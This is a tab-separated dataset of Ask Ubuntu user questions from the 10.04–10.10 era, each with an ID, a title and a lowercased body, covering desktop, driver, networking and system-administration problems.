6873	setting gpu fan speed using free ati driver ?	is it possible to set the gpu fan speed using the default free ati driver ? my card ( x1900 ) was deprecated in the fglrx drivers a while back . the free drivers seem to work with 3d , compiz and such , but running graphics intensive programs makes my gpu heat up and produce artifacts , while the gpu fan never seems to increase . ( when set to 100 % in windows it makes a massively louder noise . )
6875	ca n't login , kde loads , then back to kdm	hello to all ( k ) ubuntu users , i installed kubuntu 10.10 after it 's release . ( i used to use ubuntu , i want to try kubuntu now ) now i ca n't login in kubuntu : when ( /if ) i login with my username and password , kde loads ( i mean the splashscreen ) , but if it 's ready nearly , the screen becomes dark and i 'm back in the login-manager . i tried many things : with a new user or with installing gdm or install it new ( two times ! ) thank you for helping ps : ubuntu works normal edit : the text-console-mode ( or however it 's named in english ) is n't working at all , seems like a graphics bug or something similiar . and there are n't very many ( hidden ) `` .folders '' , just .kde .config .dbus .fontconfig and some `` .files '' .
6877	empathy does n't connect to facebook account	empathy worked pretty fine until last updates , now it refuses to connect to facebook account . all other accounts work fine , except facebook . my username and password are 100 % correct . i'v tried to remove and add fb account , but it does n't solve the problem . please help : )
6882	what happened to `` roll up '' option in preferences/window/title bar action ?	i like very much the option `` roll up '' in preferences/window/title bar action but it is not there anymore in 10.10 . there are a way to get it back ?
6897	where to install programs ?	i 've downloaded a .tar.gz and ran sudo sh install.sh . it 's asking me where to install the program to . i do n't want it cluttering up my home directory , and i want it to be available in the applications menu . where should i put it ? /usr/bin ? /usr/local/bin ? or are those only for single binaries ? this program wants to create a folder .
6899	how-to use the compiz enhanced zoom from the ubuntu panel ?	i have a wireless mouse and i use it to control my pc ( mainly for movies ) . i was wondering if i can connect the buttons for zooming in and out on the gnome panel to my mouse directly , so i can zoom in and out with a single click . thank you .
6906	can i upgrade from a 32-bit install to a 64-bit one ?	this may be a completely wacky idea , but i have 10.04 32-bit installed and want to update to 10.10 . i also want to move to the 64-bit release . is there anything special i need to do to accomplish this ? should i plan a nuke-and-pave to do the install , or can it be upgraded in situ ?
6914	can i list a repository content before adding it to search for a package ?	i want to keep my /etc/apt/sources.list clean and i 'm looking for a way to look for a package in a repository before adding it to my system . thanks in advance .
6916	exchange with evolution or any other mail client	i see other questions about this , no answers and no one with a completely similar question . i work for a place with an exchange 2007 server . there is an http : //owa.ourserver.com that is accessible from anywhere . i 've tried every combo i can think of for evolution - > microsoft exchange , including the mapi plugin , but then i read that , that does n't work on owa exchange email servers and i ca n't get it to connect at all that way . if there is no way to connect via evolution , is there another mail client ? i tried thunderbird , but i could n't get it to work with exchange either ...
6925	is there an easy way to transfer an os from one hard drive to another ?	so here 's my situation . i have a dual boot windows7 and ubuntu 10.04.1 on a run-of-the-mill hard drive . in a day or two i will get a new 64gb ssd in the mail and want to boot from that for obvious reasons . i was wondering if there was an easy way to transfer both os 's from my current hard drive to my ssd . i would normally reinstall the two on the new disk but my windows7 product key only works for activation once and i would like to keep it . any ideas would be greatly appreciated .
6926	if i already have windows as separate partition , is there a way to run this with virtualbox ?	i already have windows he installed on my computer in a separate partition . i would like to be able to use this with virtualbox , but i 'm unsure how to do this . since my computer came with windows installed , i do not have a windows instillation disc . is there a way to create an .iso file that contains my windows installation ? there are a few programs under windows but i really would like to use , but they do not have a linux equivalent .
6928	is there any way to display time in utc on the panel ?	how can i get two clocks in my gnome panel with one being in my local time and the other being in utc ?
6936	wireless network unstable and often wpa2 protected networks just do n't work	i have an issue with my wireless network , so that the connection is working for only a few minutes , after which my browser no longer is able to load pages , even if the wireless is still active/connected . furthermore , most of the time wpa2-personal protected networks do n't work , ( yesterday was the first time it worked - for a few minutes ) . by `` do n't work '' i mean that it seems to successfully connect , but the browser ca n't load pages . i am running ubuntu 10.10 32bit , and my wireless card is a ralink rt3090 . no changes have been done to any settings since ubuntu was installed - networking began working on its own after the installation - but as described in first paragraph not very well .
6942	how to enable hibernation on my netbook ?	when i choose to hibernate , my netbook goes to a black page and hibernate does not work . what steps can i take to allow my netbook to hibernate ?
6943	how can a proxy be set for the whole xubuntu system ?	hello i need to find out how to enable a system wide proxy in xubuntu 10.10
6946	er diagram software	er diagram software for ubuntu ?
6948	how to run java application in kde with qt-like ui ?	continuing my question in install ubuntu or kubuntu ? i have tried kubuntu ( kde ) , and it was very cool as cool as ubuntu ( gnome ) . but there is little problem with its user interface when we start java application ( limewire , netbeans , eclipse ) . user interface changed to metal , ( which i think is a bit old school ) . can we run it with qt like ui ? , such as when we start java application in gnome ( run with gtk like ui/emulation gtk like ui ) ? i hear there is a class for java in order to make java application ui like qt , called the qt/jambi bindings for java . how can we integrate it in kde when we start java application ? my other question is if not wrong , openoffice was built in java , so why openoffice can run with qt like ui in kde ?
6951	automatic mute speakers when headphones are unplugged	i listen to music almost any time i am on my computer . i often accidentally unplug my headphones . this has resulted in disturbing others around me . does any one know of a way to mute the speakers ( and potentiality pause vlc ) when headphones are unplugged ? i would like to do this on my laptop . it is an acer aspire one d150 . the speakers are built-in to the computer . my headphones are standard 1/8 in which connect through the headphone jack .
6957	on resume from screensaver , gnome can not accept keyboard input	i 've had this problem for a long while ... first the computer goes into screensaver . then when it resumes the currently focused window can not receive keyboard events of any kind until focus is lost and then gained again . anyone seen something like this/knows why it happens ? as a side note , i always password lock the computer when going into screensaver mode .
6963	chromium fonts are buggy	in ubuntu 10.10 i changed kde applications fonts settings on âťsystemsettingsâť ( i enabled anti-aliasing , i think this is the problem ) , and all fonts in chromium browser do not render as they would , they look ugly . i restored default settings and all remained ugly . so i purged all kde applications and all remained the same . i purged , deleted all config files and reinstalled chromium and the fonts are still ugly and rare . in the rest of my desktop and web browsers are as they used to look . here some pics . chromium now midori ( chromium used to look like this ) thanks in advance .
6965	system wide browser protocol handlers ?	when developing an application for a windows system , there is a registry entry you can make on the client machine that sets a 'protocol handler ' in the system . in the same way that mailto links work you can have it launch your application when a specific url ( ie . myapp : ) is put into a web browser address bar . this registry entry seems to work for the common browsers and does not require specific setup for each possible browser . i have in the past , set a custom protocol handler in firefox on linux however ... i was wondering if there was a way to do it system wide so that it would work the same for chromium , etc as well ?
6967	reset the icons after upgrade	i 've noticed screenshots of 10.10 with these rather cooler looking square icons . however when i upgraded my machines i did n't receive and icon upgrade . is this because it was n't a fresh install and is retaining old style data - or is this a custom addition ?
6969	is it possible to run microsoft office 2010 ?	i was curious seeing as how my work uses it , so will it run ? or is there a way of getting it to run ?
6971	how to get a bug noticed	what is the best way to get a critical bug noticed by the right people , so it can be fixed asap ? there is a bug with gvfs which is preventing developers , like myself , from using ide 's in 10.10 . we need to downgrade to 10.04 to use our ide software . i 'd call it a critical bug . we 've reported it in these bug reports : https : //bugs.launchpad.net/ubuntu/+source/gnome-vfs/+bug/658069 https : //bugs.launchpad.net/ubuntu/+source/geany/+bug/643253 but , so far there has been absolutely no official response that i can see . how do i get it seen quickly and fixed ? i understand patience is always a good idea , but is there anything else that can be done to these bug reports to raise attention to them ? i am happy to wait , but if there is something we can do to speed up the process , it would be good to know it : )
6992	wireless card behaving oddly on an hp pavilion dv6	i 'm not sure what kind it is , it does n't use a propriety driver , it runs out of the box . in 10.04 it worked fine , in 10.10 it 'll work , but randomly lose connection , though it wo n't state it , then it 'll work again , and then stop working , very on-and-off behavior . the laptop is an hp pavilion dv6 .
6993	internal microphone not working	i have an internal microphone in my laptop . i think it uses intel high definition audio . but i ca n't get it to work with ubuntu . it does n't work with either the sound recorder or skype . on the input tab in 'sound preferences ' , i just see internal analog input device ...
6994	gwibber will not allow me to log into facebook	i have installed ubuntu 10.10 and it does not work , it has n't worked since the beta i believe , any ideas ? by the way this is a clean install , and it does not work on my older install either .
6995	how to enable ufw firewall to allow icmp response ?	i have a series of ubuntu 10.04 servers and each one has ufw firewall enabled . i have allowed port 22 ( for ssh ) and 80 ( if it 's a webserver ) . my question is that i am trying to enable icmp echo response ( ping reply ) . icmp functions differently than other protocols -- i know it is below the ip level in a technical sense . you can just type sudo ufw allow 22 , but you can not type sudo ufw allow icmp
6996	how to keep `` dot files '' under version control ?	etckeeper is a great tool for keeping track of changes to your configuration files in /etc a few key things about it really stand out . it can be used with a wide variety of vcss : git , mercurial , darcs , or bzr . it also does auto commits daily and whenever you install , remove or upgrade package . it also keeps track of file permissions and user/group ownership metadata . i would also like to keep my `` dot files '' in my home directory under version control as well , preferably bazaar . does anyone know if a tool like etckeeper exists for this purpose ? worst case , i imagine that a simple cron job running bzr add & & bzr ci once or twice a day along with adding ~/documents , ~/music , ect to the .bzrignore anyone already doing something similar with a script ? while i 'd prefer bazaar , other options might be interesting .
6998	how do i get rid of the unsupported packages mentioned during the upgrade from lucid to maverick ?	when upgrading from lucid to maverick using the update manager , at one point it lists the packages that are no longer supported ( i.e . f-spot ) . it does not say that it 's going to uninstall them . after the upgrade is complete , they are still there . how can i get rid of them ?
7001	how to enable the hdmi sound on a ecs gt240 ?	i ca n't enable the sound os hdmi in maverick with a ecs gt240 . why this not work `` out of the box '' ?
7002	how to set up multiple hard drives as one volume ?	i am about to set up box to basically be a file server . i plan on having multiple drives in the box , and would like to set them all up so that they appear to be a single drive . so i could essentially have it mounted at say /media and not really care which drive gets used . i am not sure what the correct terminology for doing this is , so my google fu is useless in this situation . so how do i set up multiple hard drives to appear as one single drive ?
7006	widget engine compatibility with compiz widget layer	the title pretty much says it all : in your experience , which widget engine is most compatible ( stable ) when used in conjunction with the compiz widget layer ? http : //wiki.compiz.org/plugins/widget lists screenlets , gdesklets , xdesklets , superkaramba & moonlight widgets as common engines but provides no data on which work best with compiz . last time i used a widget layer i noticed that widgets did n't always stay on the layer ( sorry ca n't remember which engine i was using , it was quite some time ago ) - hence my question . right now i 'm running lucid . i realise this may be somewhat subjective but i think your actual experiences matter .
7007	is it possible to dynamically change the task manager icons ?	i do n't use dock apps , just kde panel with task manager . i want to know if it is possible to change the browser task icon to match the site favicon instead of the browser icon ? i use firefox 4 , kde 4.4 and ubuntu 10.04
7013	applications disappear from gnome panel after cloning to machines with the same hardware	i have cloned ubuntu installation to multiple machines by following this guide . the cloning works well . but if there are some custom installed apps in the originally installed machine , after cloning the clones do n't show up custom apps in the gnome panel . i have partly solved the problem by booting into recovery mode and selecting 'repair broken packages ' but i have a slow internet connection and it takes very long time on each machine . another solution was to create shortcuts for those apps on the desktop on the original machine , which also appear on the cloned machines . is there any way to make cloned machines show all the apps in the gnome panel .
7014	undervolting with a 2.6.35 kernel ?	i am trying to undervolt my ubuntu 10.10 , using the info from the following link : http : //openmindedbrain.info/09/05/2010/undervolting-in-ubuntu-10-04-lucid-lts/ but i ca n't install the undervolt module because of the kernel in 10.10 , do i have to wait for a while before the undervolt module gets updated ? or is there a workaround ?
7015	how can i save a video conversation in empathy ?	i 'm chatting with a friend and i 'd like to save the video to see the conversation again later . how can i do that ?
7018	how do i set the acceleration , scrolling rate , and other properties of my magic mouse ?	i do not want to change my main mouse 's settings . i just want to change the properties for the magic mouse . i would prefer to use udev rules . can anyone tell me how to do it ? so far i have the following info : /dev/input $ xinput list-props 12 device 'magic mouse ' : device enabled ( 121 ) : 1 coordinate transformation matrix ( 123 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 244 ) : 0 device accel constant deceleration ( 245 ) : 1.000000 device accel adaptive deceleration ( 246 ) : 1.000000 device accel velocity scaling ( 247 ) : 10.000000 evdev reopen attempts ( 238 ) : 10 evdev axis inversion ( 248 ) : 0 , 0 evdev axes swap ( 250 ) : 0 axis labels ( 251 ) : `` rel x '' ( 131 ) , `` rel y '' ( 132 ) button labels ( 252 ) : `` button left '' ( 124 ) , `` button middle '' ( 125 ) , `` button right '' ( 126 ) , `` button wheel up '' ( 127 ) , `` button wheel down '' ( 128 ) , `` button horiz wheel left '' ( 129 ) , `` button horiz wheel right '' ( 130 ) evdev middle button emulation ( 253 ) : 2 evdev middle button timeout ( 254 ) : 50 evdev wheel emulation ( 255 ) : 0 evdev wheel emulation axes ( 256 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 257 ) : 10 evdev wheel emulation timeout ( 258 ) : 200 evdev wheel emulation button ( 259 ) : 4 evdev drag lock buttons ( 260 ) : 0
7021	alternatives to rpm -qa and rpm -ql in ubuntu	i am following linux cbt tutorials for rhel to learn some linux basics . if i want to know if a particular package is installed in ubuntu , i usually type dpkg -l and grep the needed name . such as dpkg -l | grep cron is it same as using rpm -qa | grep cron for redhat based oses ? that guy also uses rpm -ql to list the file locations . such as rpm -ql crontabs can some one tell me what exactly does rpm -ql list and how can i get a similar command in ubuntu to list all relevant files like rpm -ql crontabs . ( right now , i use locate cron and it lists me every file )
7025	convert chm to ebook for kindle 3	is there any application for ubuntu that can convert chm files to ebook compatible with kindle ?
7026	how can i reset the defaults settings in unity ?	i have been experimenting with window managers and now i misconfigured compiz , to me it would be useful a terminal command
7027	why is the 64bit 10.10 iso labeled amd64.iso ?	and should i be reluctant to try and install it on a laptop with an intel processor + 6g ram ? ( probably a silly question , i know because i do n't need the 64 bit edition , but i 'm hearing if i want to utilize all the available ram i ca n't be content with the 32 . ) but i ca n't shake the sneaking suspicion that i 'm overlooking something important .
7034	what are the differences between 32-bit and 64-bit , and which should i choose ?	what is the difference between 32-bit and 64-bit ubuntu ? i 've heard the 64-bit platform performs better and can detect more than 4gb of ram . also , while some apps have n't ported to 64-bit yet , ia32-libs lets a 64-bit machine run them . if so , why not promote 64-bit over 32-bit ?
7043	how do i control the position of an indicator created with appindicator.indicator ?	i 've created a simple indicator in python using the appindicator module . however , it always shows up to the left of the existing indicators . is there some way to control what position the indicators appears in ? for example , it currently displays like so ... my indicator , volume indicator , messaging indicator but i want ... volume indicator , messaging indicator , my indicator
7044	using 'quota ' for disk limits	i installed quota using apt-get and followed some of the tutorials online . i ran sudo edquota username which opened nano and gave a chart for me to edit . what does the chart mean when it says soft , hard , etc. ? is there a proper tutorial for quota on ubuntu ? what 's the official website for quota ? or is there another option for setting user disk limits ?
7054	how can i trash a file from the command line ?	can i make a shell script trash files instead of delete them ? in the past i used gvfs-trash but this does n't appear to exist in ubuntu 10.10 .
7057	why kubuntu kde default start menu icon not using kubuntu icon just like ubuntu ?	i wonder , why kubuntu team does not use kubuntu icon in kde start menu just like ubuntu ?
7059	script / app to unrar files , and only delete the archives which were sucessfully expanded	i have a cron job which runs a script to unrar all files in a certain directory ( /rared for argument 's sake ) and place the expanded files in /unrared . i would like to change this script so that it deletes the original rar archives from /rared only if they successfully extracted . this does not mean that unrar has reported that they have been fully extracted , because i have had data corruption during decompression before . ideally ( pie-in-the-sky , just to give you an idea of what i 'm shooting for , ) the unrar program would include this functionality , comparing an expected md5sum value with the actual md5sum value and only deleting the archive if they match . i do n't mind scripting this entire process if i have to , but there must be a better way than unraring twice and comparing md5sums .
7061	syncing ubuntu one from lan	does ubuntu one look for sources of files it needs to download on the lan before it goes off and grabs them from the cloud ? i live in australia , and we have download limits here , so i 'm nervous that having ubuntu one installed on a few computers could burn my available downloads pretty fast . i know it is possible to get around this with rsync , but if i 'm doing that , i do n't really need ubuntu one , and it is likely that ubuntu one will realise there have been changes much faster than my cron jobs will .
7066	is it possible to configure ubuntu as a software firewall ?	i have some systems running on ubuntu in the private ip range 192.168.2.0-255 . these systems are connected to a switch and the switch is connected to the isp 's modem . neither the switch nor the modem support firewall options . i do n't have any firewall device and i 'm not willing to individually configure firewalls on all the systems ( via gui/iptables ) . is it possible to make an ubuntu system into something like a software firewall , so that all the traffic/packets sent to or from the wan ( internet ) would be allowed/denied based on its firewall rules ?
7068	linux diff command	can someone tell me if linux diff command can ignor difference in line which have some word ( example : cet ) example : 9c9 < < set name= '' ti_zone '' > cet < /set > -- - > < set name= '' time_zone '' > cet < /set > in this example i would like to ignore this difference ... if can do this , can you give me an example ? br , wolfy
7070	after upgrade to 10.10 , mediawiki on postgres is broken	i upgraded to ubuntu 10.10 from 10.04 . 90 % of the upgrade was ok but my ubuntu-apache2-postgres-8.4 - mediawiki1.16 does not work anymore . is there a bug in the postgres client or in php5 pg ?
7071	`` no required driver detected for unity '' on dell mini 1010	i want to `` try '' ubuntu-netbook off the livecd on my dell mini1010 ( poulsbo intel gma 500 graphics card ) . it tells me that there is : '' no required driver detected for unity . you will need to choose the ubuntu desktop session once you select your user name . if you are on ubuntu live cd , the username is `` ubuntu '' and you have to enter a blank password . '' i intend to install une maverick on my mini 1010 but i want unity to function properly . does this directly reflect what will occur if i install it ? is there a way to correct this issue ? ( what drivers do i need ? )
7075	hotplug my usb mouse	whenever i try to plug in my optical mouse after my ubuntu 10.04 has booted , the os does n't seem to hotplug my mouse . for using the mouse i would need to reboot the os . is there any script which can activate my mouse ? the output of lsusb command is bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 002 : id 093a:2510 pixart imaging , inc. hama optical mouse bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 004 : id 03f0:171d hewlett-packard wireless ( bluetooth + wlan ) interface [ integrated module ] bus 003 device 003 : id 138a:0001 digitalpersona , inc fingeprint reader bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 046d:09b8 logitech , inc . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub output of my syslog : oct 14 15:00:08 avi-laptop kernel : [ 15966.380131 ] usb 5-2 : new low speed usb device using uhci_hcd and address 2 oct 14 15:00:08 avi-laptop kernel : [ 15966.554437 ] usb 5-2 : configuration # 1 chosen from 1 choice
7079	how do you configure desktop for a static ip address ?	by default ubuntu uses dhcp and gnome networkmanger to configure interfaces . this is not optimal in many cases . how to configure a desktop machine for a static ip address that applies to all users ? additional background : for 99.9 % of users a static dhcp entry is probably the easiest solution , however i have found a conflict with mythtv-background process and any changes to the eth0 interface . if the interface is brought up/down after mythtv is running , it hangs the process ( which also broke system suspend ) . so my questions really needs a static ip address , where the interface is brought up with a known ip , and stays up permanently .
7081	ubuntu one behind a proxy , how to make it work ?	i am behind a web proxy server at work ( no authentication ) and i have set it up in gnome ( configuration applied system-wide ) . it works fine for accessing internet with a browser , but numerous applications do not make use of this setting ( empathy , gwibber or ubuntu one to say a few ) and can not connect . the question here will be specific to ubuntu one which is for me more critical . how did you manage to connect to ubuntu one when behind a proxy ? the easiest solution will be preferred ; - ) have you used some tools to tunnel the data ? corkscrew ? proxychains ? if you have done that sucessfully can you share your experience and configuration instructions ? note : for those interested , here is the ubuntu one bug report . the ubuntu one is currently ( 20111031 ) conducting a user survey on the topic of proxy access . if you are also behind a proxy , please fill up their survey to help them address this problem : ubuntu one tweet for user survey .
7088	how to download games	i have a download limit in my home pc so can not download games from my home . can you recommend few games that comes in a .deb package so that i can download them outside and bring them home to download . games like max payne or nfs ( not exactly max payn or nfs ) for ubuntu . which i can download as .deb but not synaptic , as i have mentioned that i would download them outside my home and bring the deb home . thanks
7093	i ca n't uncheck `` manage windows without launcher ''	please help , i ca n't uncheck `` manage windows without launcher '' of the docky .
7097	how do i get the nuvoton infrared remote control working ?	the asrock ion330ht nettop computers ( for use as a home theatre pc ) come with a nuvoton brand infrared remote control . they apparently work with ubuntu , but the .deb files on the asrock web site are out-of-date , fail to install , and the documentation is poorly written . http : //www.asrock.com/nettop/download.asp ? model=ion % 20330ht & o=linux has anyone gotten these `` nuvoton rct6775/w836x7 '' infrared remote controls working in ubuntu 10.10 ? how did you do it ?
7099	how can i open a range of ports in ubuntu using ( g ) ufw for use with membase ?	i have membase ( membase.org ) installed and i have to open a bunch of ports in order for the cluster to function adding the single ports was easy enough but i ca n't work out how to open the range 11200-11299
7107	while installing on multiple pcs , ubuntu freezes on some pcs	i am installing ubuntu on multiple laptops by following this guide . i did it successfully on 23 laptops but on 2 laptops it freezes . when i boot it up , after login the desktop shows up , and after some time it freezes . magic sysrq key can not be used also . ctrl+alt+f2 does n't show the terminal . during installation , after boot up from the cd , many times installation failed because of random freezes . after many painful re-attempts i was able to install it , but the system freezing problem remains . if booted into recovery mode shell prompt with networking , the shell prompt also freezes . but recovery mode root shell prompt works fine , so here is the data i collected : /sys/kernel/debug/dri/0/i915_error_state shows `` no error state collected '' /sys/kernel/debug/dri/0/i915_wedged gives wedged : 0 i have installed successfully on 23 latops having same hardware but on 2 laptops i got the above menioned problem . the laptops are dell vostro 1014 . they had ubuntu 8.10 preinstalled , which worked perfectly well . both laptops pass memtest . installing ubuntu alternate gives same problem .
7111	please recommend an xml traffic capture and web debugging tool	i 've found myself in dire need of a web traffic capture tool ( specifically for xml debugging ) . i was using fiddler on windows , but i do n't know what to use in ubuntu .
7113	vnc setup over ssh	can someone provide a step by step for vnc setup on ubuntu 10.10 desktop . i have ssh access to it at the moment with root user . i tried installing vnc4server package , then after that did a vncpasswd with root and setup a password of 7characters and once of 6characters . then forwarded vnc ports via ssh tunnels but at first it gave me the prompt to type vnc password and wo n't accept , now it just wo n't connect . name of my ubuntudesktop = ubuntuhome ( 192.168.1.22 ) name of my remote machine from where i want to connect from is = lockerpc which port shall i add in `` source and destination '' in putty > ssh > tunnels ? in source i inputted localhost:5901 and in destination ip address 192.168.1.22:5900 ( the private ip of my ubuntudesktop i can successfully ssh but not vnc . will be grateful for your help . please if you can write the steps down for this scenario , as i have gone through a whole lot of links and its all very confusing . kind regards
7114	why ca n't i restart/shutdown ?	when i shutdown/restart get a black ( shell-like ) full-screen with some large text saying stuff like : ubuntu 10.10 [ 129.171175 ] restarting system . eco nds ... [ ok ] ... unmounting weak filesystems ... [ ok ] will now restart then nothing happens and i have to physically hit the reset button .
7116	tweaking login screen	are there any applications similar to login screen gdm2 ? it 's only supported till ubuntu lucid , is the splash screen after login available for maverick ?
7117	which to use nfs or samba ?	i am setting up a box to be a file server at the house . it will mainly be used to share music , pictures , movies with other linux boxes on the network , and one os x machine . from what i have read nfs and samba would work in my situation , and as such i am not sure which to choose . what is important to me is the speed transfers between boxes and how difficult it is to setup . which would you recommend and why ?
7121	server on atom d410 ?	i am new to ubuntu ( i am old time windows user and now want to shift my box ) . i want to setup my new dev box . i have selected following config for the pc processes - atom d410 , 1.6 ghz , ( 512k cache ) ram - 2 gb ( 667mhz fsb ) hdd - 250 gb ( 7200 rpm ) is that ok to run ubuntu server or should i go for bigger box ?
7131	backup mysql from terminal	i have scheduled a cron job to backup mysql databases on ubuntu9.10 . i used the following entries in the cron file . 37 4 * * * root /usr/bin/mysqldump -u root -p < mysql-password > -- all-databases > /usr/backup/mysqlbkup/all-databases.sql it backs up all the databases puts in a single file called 'all-databases.sql ' . this is what i wanted . but if i want to restore a single database i will have to restore all the databases . is there any trick to backup all mysql databases to a directory with their database name individually ? .
7135	upgrading from windows xp to windows 7	okay , even though the title says a different thing , this does mostly only affect my ubuntu installation . i have a dualboot setup for windows xp and ubuntu , windows had been installed first , then ubuntu , etc . now i want to `` upgrade '' my windows xp installation to windows 7 . i do n't care whether i lose my windows xp files or not ; but i really do not want to lose my ubuntu installation . so , how would i get rid of windows xp , install windows 7 , keep my ubuntu installation intact , and if possible , do all that with not too much hazzle ?
7138	how to change the screen resolution when using rdesktop ?	how to change the screen resolution ? i type the command rdesktop `` server ip '' but the screen does not appear large .
7141	multitouch in pymt-demo under maverick with magic trackpad	i have a magic trackpad , it 's configured as described here . the following works : 1 finger tap = leftclick 2 finger tap = rightclick 3 finger tap = middleclick 2 finger drag = scrolling but out of curiosity , i 'd like to play with pymt , which comes with a nice multitouch demo ( details : https : //wiki.ubuntu.com/multitouch/pymt ) . when starting it with `` sudo python -m pymt.tools.demo '' , the pymt-window opens but does n't register/display any multitouching . actually , it does n't display anything but a blank window where the touches show show up . i was expecting something like in this screenshot . any ideas where i went wrong or what i did n't correctly understand ? : - )
7145	start / stop init.d script without root access	i am setting up an ubuntu-server in order to host the virtuoso server . i want to setup a simple user ( without sudo ) account that will ( only ) be able to run /etc/init.d/virtuoso-opensource-6.1 [ start|stop|restart ] ( to be able to administer the virtuoso server , but not other system resources ) i guess this is similar/equivalent to any service e.g . apache2 , mysql , etc is there an option to limit access to only the virtuoso service , or an option to access to all the init.d scripts , but not the rest of the system ?
7152	how to configure ubuntu 10.x to use a different window manager ?	i want to try switching to either fluxbox or blackbox as my window manager , but i 'm not sure how to go about it . what are the steps to configuring ubuntu to use a different window manager ?
7153	what are the major differences between fluxbox and blackbox ?	i 'm considering switching to either fluxbox or blackbox as my window manager , but i 'm not really sure which one to go with . are there any major differences between the two ?
7156	system freezes after standby	i have ubuntu 10.10 installed on my laptop . ( toshiba satellite a 210 ) it has a amd turion 64 x2 cpu . whenever i put my system into standby , it freezes after returning from standby . can anybody help me . this also happened in 10.04 but not in 9.10 .
7157	audiogalaxy on ubuntu	lifehacker tells me about a neat tool called audiogalaxy that would let me stream all my music from my box to my android . this would be handy , since i regularly need to swap audio in and out for it to still fit . not to mention being able to run it from my work computer . : ) however , it seems that ubuntu is not supported . is there a way around this ? are there alternatives that are as smooth ? i 'd like it to just work .
7161	how to disable touchpad while typing on aspire one	i want to disable the touchpad while i type on my aspire one netbook . if i issue the command syndaemon the synaptics driver is not detected : unable to find a synaptics device so , i added the following to my xorg.conf file : section `` inputdevice '' identifier `` mouse0 '' driver `` synaptics '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mouse0 '' option `` zaxismapping '' `` 4 5 6 7 '' option `` corepointer '' option `` horizedgescroll '' `` 1 '' endsection it is still unable to find a synaptics device , however my touchpad works fine .
7177	what 's the normal temperature of a aao751h ?	what should be the normal temperature be for an acer aspire one 751h with a 9 cells battery running kubuntu 10.10 ? the plasmoid indicates temperatures from 53ยบ c up to 63ยบ c ( is n't this too high ? )
7178	how do i stop banshee from playing random tracks when it finishes a playlist/album ?	whenever i play music in banshee , it gets to the end of a play queue or album then starts playing a seemingly random album . for example , if i double click an album then it starts playing . at the end , it starts playing the play queue . on the other hand , if i create a play queue and play through it , at the end it skips onto anther artist or album . it tends to be the album or artist that was last selected in the music browser but not always . sometimes it will skip to track 2 or 3 as well ( shuffle is not on ) . how do i get banshee to just play an album or a play queue then stop ?
7189	why does pasting sometimes not work in gnome-terminal ?	ctrl + shift + c and ctrl + shift + v are supposed to replace the normal ctrl + c and ctrl + v in gnome-terminal . sometimes they work , but usually they have no effect . what are some potential reasons for this ? i 'm not sure what other information to give . edit : it seems that manually selecting paste from the edit menu does not work either . right click > paste works , but edit > paste does not . copying works , but pasting does not . also , i have vi-mode enabled ( set -o vi in my ~/.bashrc ) . could this have something to do with it ? edit : here is a video demonstrating the problem . i used screenkey ( in `` raw '' mode , to catch `` shift '' ) to show what keys i am pressing .
7190	why wo n't my ~/.xmodmap file load on login ?	i created the following ~/.xmodmap file as per this answer . keysym delete = menu keysym menu = delete clear lock keycode 0x42 = escape in other words , swap delete and menu , and make caps lock an additional escape . the next time i logged in , ubuntu asked me if i wanted to load ~/.xmodmap as expected . i loaded it , but nothing happened ( either then or on subsequent logins ) . if i manually run xmodmap ~/.xmodmap , it works as expected . i know that this worked early in the 10.10 beta , but it 's failing on my fresh 10.10 install . i have n't tried in on anything earlier than 10.10 . any ideas ? edit : i put some debugging statements in /etc/gdm/xsession to make sure ~/.xmodmap was loading , and everything magically started working . i did n't change anything except adding some echos , and it 's still working now that i reverted my changes and restarted again . strangest thing i ever saw . one thing i realized is that the `` remap caps lock to escape '' part of the xmodmap was always working . it was just the delete/menu swap that failed . i 'll leave this question open for now in case anyone else has the same problem , since i do n't actually know why the problem stopped .
7196	i have a hp probook 4510s and everytime i plug it in , the monitor dims	anyone else notice this on their laptops , or is it just mine ? ubuntu 10.10 by the way ...
7200	second gen ipod shuffle not working with rhythmbox	i 'm trying to get a second gen ipod shuffle to work with ubuntu 10.10 . as far as i understand rhythymbox should support this . when i plug the ipod in it shows up under the devices section of the menu , but after that i am unable to do anything with it . i ca n't see the songs that are already on it , i ca n't add new songs , i ca n't do anything . when i attempt to drag a song across , absolutely nothing happens . if i try the sync with library option , it shuts rhythymbox down completely . any ideas would be greatly appreciated .
7202	how to get bluetooth working on macbook pro 6.2	has anyone figured out how to get bluetooth working on a macbook pro 6,2 under ubuntu 10.10 ?
7203	what 's the terminal command for finding out a process 's id	i want to exit a process using the command line , but i ca n't recall the command to look up the process 's id . does anyone know it ?
7205	battery indicator is stuck on `` estimating '' ?	after installing ubuntu 10.10 , the battery indicator worked fine ( both percent remaining and estimation on time ) . i then installed and configured some software ( skype , pidgin , thunderbird , removed empathy and evolution , ect ) and the battery meter , when clicked , always says `` ( estimating ... ) '' i 've tried running the battery down to zero and charging it fully again . if i go into the history or details , the percentage is recorded correctly . any ideas ?
7206	how can i assign an application to always open in workspace # 2 ?	i would like to open up evolution in workspace # 2 everytime by default , since there is no minimize to system tray icon this will help me get it in the `` background '' . how can i accomplish this ?
7212	ubuntu one in startup applications	accidentally , removed the entry from `` ubuntu one '' entry from the startup applications , means i wont automatically get synced on startup . please help . goto your system > preferences > startup applications now look for the entry saying 'ubuntu one ' . click edit from the right pane , you 'll see the command there . kindly tell me that command .
7218	usb sound device not recognized	i have a usb sound device that used to work back when i ran other versions of ubuntu . now i can only partially see the device . i have tried many things i saw in google searches , but none solve my problem . cat /proc/asound/cards sees the device as card 0 aplay -l shows c-media usb audio as card 0 alsamixer sees the device asoundconf list does not show the device sound preferences shows no hardware asoundconf-gtk set the device to pulseaudio , but fails with python errors ending in valueerror : too many values to unpack in the function set_default_card . i think this is the cause of my problem . the device is a sony virtual phones wireless headphone amplifier .
